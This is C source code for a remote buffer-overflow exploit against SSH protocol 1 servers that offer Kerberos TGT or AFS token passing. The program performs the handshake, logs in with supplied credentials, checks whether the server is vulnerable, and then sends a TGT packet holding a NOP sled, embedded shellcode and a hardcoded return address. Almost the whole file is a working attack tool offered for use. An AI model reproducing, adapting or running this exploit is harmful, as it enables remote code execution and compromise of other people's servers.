#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "gmp.h"
#include "include.h"
#include "crc32.h"
#include "mpaux.h"
#include "randoms.h"
#include "rsa.h"
#include "packet.h"
#include "getput.h"
#include "cipher.h"
#include "uuencode.h"
#include "egg.h"




static BUFFER input, output;
static word32 supported_authentications;

void fatal (char *fmt, ...)
{
  va_list ap;
  char buffer[1024];


    va_start(ap, fmt);
    vsnprintf(buffer, sizeof(buffer), fmt, ap);
    printf("\n  FATAL: %s\n", buffer);
    fflush(stdout);

    _exit(0);
}



int ssh_connect(char *host, int port)
{

  int ret, sock;
  struct sockaddr_in hostaddr;
  int hostaddrlen = sizeof(hostaddr);


    if (strcmp(host, "localhost") == 0) host = "127.0.0.1";

    memset(&hostaddr, 0, hostaddrlen);    
    hostaddr.sin_family      = AF_INET;
    hostaddr.sin_port	     = htons(port);
    hostaddr.sin_addr.s_addr = inet_addr(host);
    if ((hostaddr.sin_addr.s_addr & 0xffffffff) == 0xffffffff)
	fatal("not a valid numeric inet address!");

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) fatal("ssh_connect: socket");
    
    ret = connect(sock, (struct sockaddr *) &hostaddr, hostaddrlen);     
    if (ret == -1) fatal ("ssh_connect: connect");
    
    
    return(sock);

}



void read_mp_int (MP_INT *value, BUFFER *input)
{
  int i, bytes, bits;
  char *hex;


    bits  = GET_16BIT(input->start);
    input->start += 2;
    
    bytes = (bits + 7) / 8;
    hex   = malloc(2 * bytes + 1);
    if (hex == NULL) fatal("read_mp_int:malloc");
    memset(hex, 0, 2 * bytes + 1);


    for (i = 0; i < bytes; i++)
    {
	unsigned char byte;
	byte = input->start[i];
	sprintf(hex + 2 * i, "%02x", byte);
    }
    input->start += bytes;

    mpz_set_str(value, hex, 16);
    memset(hex, 0, strlen(hex));
    free(hex);
    return;
}



void write_mp_int (MP_INT *value, BUFFER *output)
{
  int bits, hex_size, i, oi, byte;
  char *buf, msg[2];


    bits = mpz_sizeinbase(value, 2);
    hex_size = mpz_sizeinbase(value, 16);
    buf = malloc(hex_size + 2);
    if (buf == NULL) fatal ("write_mp_int: malloc");
    
    mpz_get_str(buf, 16, value);
    
    i = oi = 0;
    
    if (hex_size & 1)
    {
	sscanf(buf, "%1x", &byte);
	buf[oi++] = byte;
	i = 1;
    }

    for (; i < hex_size; i += 2)
    {
	sscanf(buf + i, "%2x", &byte);
	buf[oi++] = byte;
    }

    if (oi != ((bits + 7) / 8)) fatal("write_mp_int: fucka");
    PUT_16BIT(msg, bits);
    
    memcpy(output->end, msg, 2);
    output->end += 2;
        
    memcpy(output->end, buf, oi);
    output->end += oi;
    
    memset(buf, 0, hex_size + 2);
    free(buf);
    return;    
}



int ssh_exchange_identification (int sock)
{

  char buf[256];
  unsigned int i;
  unsigned char x;
  int ret, rmajor, rminor;



    for (i = 0; i < sizeof(buf) - 2; i++)
    {
	x = read_char(sock);
	if (x == 0) return(SERVER_CLOSED_SESSION);

	if (x == '\r' || x == '\n')
	{
	    buf[i] = 0;
	    break;
	}

	buf[i] = x;
    }
    
    buf[i] = 0;

    ret = sscanf(buf, "SSH-%d.%d-%100s", &rmajor, &rminor, buf); 
    if (ret != 3) fatal("Bad remote protocol version! %.100s", buf);
    printf("remote protocol version %d.%d, software version -- %.100s --\n",
	rmajor, rminor, buf); 


    snprintf(buf, sizeof(buf), "%s\n", CLIENT_PROTOCOL);
    printf("client protocol:%s", buf);
    ret = write(sock, buf, strlen(buf));
    if (ret == 0) return(SERVER_CLOSED_SESSION);
    if (ret <  0) return(COMM_ERROR);

    return(COMM_OK);

}



void get_public_key (int sock)
{

  RSAPublicKey public_key, host_key;
  unsigned char check_bytes[8], type;
  unsigned int protocol_flags, supported_ciphers;
  unsigned long tmp;
  int i;
  unsigned char session_id[16], session_key[SSH_SESSION_KEY_LENGHT];
  MP_INT key;
  RandomState state;
  
  

    input.src  = malloc(256 * 1024);
    if (!input.src) fatal("public_key inbuf: malloc");
    output.src = malloc(256 * 1024);
    if (!output.src) fatal("public_key outbuf: malloc");


    input.cipher  = output.cipher = SSH_CIPHER_NONE;
    input.start   = input.src;
    input.cipher  = SSH_CIPHER_NONE;
    output.cipher = SSH_CIPHER_NONE;
    
    
    type = read_packet(&input, sock);  
    if (type == SSH_MSG_DISCONNECT)
	fatal("server closed connection");
    if (type == SSH_MSG_IGNORE)
	fatal("server ignored connection");
    if (type != SSH_SMSG_PUBLIC_KEY)
	fatal("public key: invalid packet type:%d\n", type);

    for (i = 0; i < 8; i++) check_bytes[i] = input.start[i];

    input.start += 8;


/* GET THE PUBLIC KEY */
//---------------------
    public_key.bits = GET_32BIT(input.start);
    input.start += 4;
    
    mpz_init(&public_key.e);
    read_mp_int(&public_key.e, &input);
    
    mpz_init(&public_key.n);
    read_mp_int(&public_key.n, &input);

    
/* GET THE HOST KEY */
//-------------------

    host_key.bits = GET_32BIT(input.start);
    input.start += 4;

    mpz_init(&host_key.e);
    read_mp_int(&host_key.e, &input);

    mpz_init(&host_key.n);
    read_mp_int(&host_key.n, &input);


/* GET PROTOCOL FLAGS */
//---------------------

    protocol_flags = GET_32BIT(input.start);
    input.start += 4;
    
    protocol_flags &= SSH_PROTOFLAG_HOST_IN_FWD_OPEN;    


/* SUPPORTED CIPHER TYPES */
//-------------------------

    supported_ciphers = GET_32BIT(input.start);
    input.start += 4;

    printf("supported ciphers:");
    if (supported_ciphers & (1 << SSH_CIPHER_IDEA))
	printf(" IDEA");
    if (supported_ciphers & (1 << SSH_CIPHER_DES))
	printf(" DES");
    if (supported_ciphers & (1 << SSH_CIPHER_3DES))
	printf(" 3DES");
    if (supported_ciphers & (1 << SSH_CIPHER_ARCFOUR))
	printf(" ARCFOUR");
    if (supported_ciphers & (1 << SSH_CIPHER_BLOWFISH))
	printf(" BLOWFISH");

    printf("\n");
    fflush(stdout);


/* SUPPORTED AUTHENTICATION TYPES */
//---------------------------------

    supported_authentications = GET_32BIT(input.start);
    input.start += 4;

    printf("supported authentications:");
    if (supported_authentications & (1 << SSH_AUTH_RHOSTS))
	printf(" RAUTH");
    if (supported_authentications & (1 << SSH_AUTH_RSA))
	printf(" RSA");
    if (supported_authentications & (1 << SSH_AUTH_PASSWORD))
	printf(" PASSWORD");
    if (supported_authentications & (1 << SSH_AUTH_RHOSTS_RSA))
	printf(" RHOSTS_RSA");
    if (supported_authentications & (1 << SSH_AUTH_TIS))
	printf(" TIS");
    if (supported_authentications & (1 << SSH_AUTH_KERBEROS))
	printf(" KERBEROS");
    if (supported_authentications & (1 << SSH_PASS_KERBEROS_TGT))
	printf(" PASS_KERBEROS_TGT");
    if (supported_authentications & (1 << SSH_PASS_AFS_TOKEN))
	printf(" PASS_ASF_TOKEN");


    printf("\n");
    printf("received server public key (%d bits) and host key (%d bits)\n",
	public_key.bits, host_key.bits);
    fflush(stdout);


/* COMPUTE SESSION ID */
//---------------------

    compute_session_id(session_id, check_bytes, host_key.bits, &host_key.n,
	    public_key.bits, &public_key.n);    

//---------------------


    
    for (i = 0; i < SSH_SESSION_KEY_LENGHT; i++)
	session_key[i] = (unsigned char) random();

    mpz_init_set_ui(&key, 0);    
    for (i = 0; i < SSH_SESSION_KEY_LENGHT; i++)
      {
	mpz_mul_2exp(&key, &key, 8);
	if (i < 16) mpz_add_ui(&key, &key, session_key[i] ^ session_id[i]);
	else mpz_add_ui(&key, &key, session_key[i]);	    
      }


    if (mpz_cmp(&public_key.n, &host_key.n) < 0)
      {
	if (host_key.bits < public_key.bits + SSH_KEY_BITS_RESERVED)
	    fatal("what the fucka");

	rsa_public_encrypt(&key, &key, &public_key, &state);
	rsa_public_encrypt(&key, &key, &host_key, &state);
	
      }
    else	
      {
	if (public_key.bits < host_key.bits + SSH_KEY_BITS_RESERVED)
	    fatal("what the fucka");
	
	rsa_public_encrypt(&key, &key, &host_key, &state);
	rsa_public_encrypt(&key, &key, &public_key, &state);
	
      }	


/* session key exchange */
//------------------------

    packet_start(&output, SSH_CMSG_SESSION_KEY);
    
    memset(output.end, SSH_CIPHER_BLOWFISH, 1);
    output.end++;

    for (i = 0; i < 8; i++) output.end[i] = check_bytes[i];
    output.end += 8;

    write_mp_int(&key, &output);    
    
    tmp = (SSH_PROTOFLAG_SCREEN_NUMBER | SSH_PROTOFLAG_HOST_IN_FWD_OPEN);
    PUT_32BIT(output.end, tmp);
    output.end += 4;


    write_packet(&output, sock);


//- SET CIPHER TYPE AND KEY -
//---------------------------

    input.cipher  = SSH_CIPHER_BLOWFISH;
    output.cipher = SSH_CIPHER_BLOWFISH;
    
    cipher_set_key(input.cipher, &session_key[0], SSH_SESSION_KEY_LENGHT);

//---------------------------


    mpz_clear(&key);
    rsa_clear_public_key(&public_key);
    rsa_clear_public_key(&host_key);
    

    type = read_packet(&input, sock);    

    if (type == SSH_SMSG_SUCCESS)
	printf("successful handshake\n");

    if (type == SSH_SMSG_FAILURE)
	fatal("server told me f..k off\n");

    return;

}



void
terminal (int in, int out)
{
  unsigned char buf[1024];
  int ret;
  fd_set rfds;



    for (;;)
     {

	FD_ZERO(&rfds);
	FD_SET(in, &rfds);
	FD_SET(out, &rfds);

	ret = select((in > out ? in : out) + 1, &rfds, NULL, NULL, NULL);

	if (FD_ISSET(in, &rfds))
	 {
	    memset(buf, 0, sizeof(buf));
	    ret = read(in, buf, sizeof(buf));
	    if (ret > 0) write(out, buf, ret);
	    else break;
	 }

	if (FD_ISSET(out, &rfds))
	 {
	    memset(buf, 0, sizeof(buf));
	    ret = read(out, buf, 1000);
	    if (ret > 0) write(in, buf, ret);
	    else break;
	 }

     }

    printf("\n  lost connection\n\n");
     
    return;

}



void auth_password(char *username, char *password, int sock)
{
  unsigned char type;
  


    packet_start(&output, SSH_CMSG_USER);
    PUT_32BIT(&output.end[0], strlen(username));
    output.end += 4;
    sprintf(&output.end[0], username);    
    output.end += strlen(username);

    write_packet(&output, sock);
    type = read_packet(&input, sock);    

    if (type == SSH_SMSG_SUCCESS)
     {
	printf("!!!auth accepted without password for:%s!!!\n", username);
	return;
     }

    packet_start(&output, SSH_CMSG_AUTH_PASSWORD);
    PUT_32BIT(&output.end[0], strlen(password));
    output.end += 4;
    sprintf(&output.end[0], password);    
    output.end += strlen(password);
    
    write_packet(&output, sock);
    type = read_packet(&input, sock);    
    
    if (type != SSH_SMSG_SUCCESS) fatal("!!! user/pass !!!\n");

    printf("AUTH Successfull\n");

    return;
}



int main (int argc, char *argv[])
{
  char *host;
  int ret, sock;
  word32 len;
  unsigned char tmpbuf[8192], sendbuf[8192];
  word32 injection = 0xbfffe470;

  

    if (argc != 4)
     {
	printf ("\n usage: <host IP addr> <username> <password>\n");
	printf ("\n");	
	_exit(0);
     }

    if (strlen(argv[1]) > 64 || strlen(argv[2]) > 64 || strlen(argv[3]) > 64)
	fatal("what kind of input is this????");


    host = argv[1];


    sock = ssh_connect(host, PORT);
    printf("\nconnected\n");


    ret = ssh_exchange_identification(sock);
    if (ret != COMM_OK) fatal("ssh_exchange_identification");


    printf("waiting for server public key\n");
    get_public_key(sock);


/* CHECK IF VULNERABLE */


    if (supported_authentications & (1 << SSH_PASS_AFS_TOKEN))
	printf("\n SERVER VULNERABLE - AFS TOKEN PASSING");

    if (supported_authentications & (1 << SSH_PASS_KERBEROS_TGT))
	printf("\n SERVER VULNERABLE - KERBEROS TGT PASSING\n\n");

    else fatal(" SERVER IS NOT VULNERABLE");


/* AUTH */


    auth_password(argv[2], argv[3], sock);


/* INJECTION */


    memset(tmpbuf, 0, sizeof(tmpbuf));
    memset(sendbuf, 0, sizeof(sendbuf));

    packet_start(&output, SSH_CMSG_HAVE_KERBEROS_TGT);

    memset(tmpbuf, 0x01, 1);		/* KERBEROS V4 TGT - 0x41 (1 for example) */
    memset(tmpbuf + 1, 0x90, 1516);	/* NOPS */


    for (len = 0; len < strlen(egg); len++)
	(unsigned char) tmpbuf[len + 90] = (unsigned char) egg[len];


    tmpbuf[1517] = (injection & 0x000000ff);
    tmpbuf[1518] = (injection & 0x0000ff00) >> 8;
    tmpbuf[1519] = (injection & 0x00ff0000) >> 16;
    tmpbuf[1520] = (injection & 0xff000000) >> 24;
      

    len = uuencode(tmpbuf, strlen(tmpbuf), sendbuf, sizeof(sendbuf));

    PUT_32BIT(&output.end[0], len);
    output.end += 4;

    sprintf(&output.end[0], "%s", sendbuf);
    output.end += len;
    
    write_packet(&output, sock);

    printf("\n check /tmp/ash\n");

    _exit(0);

}

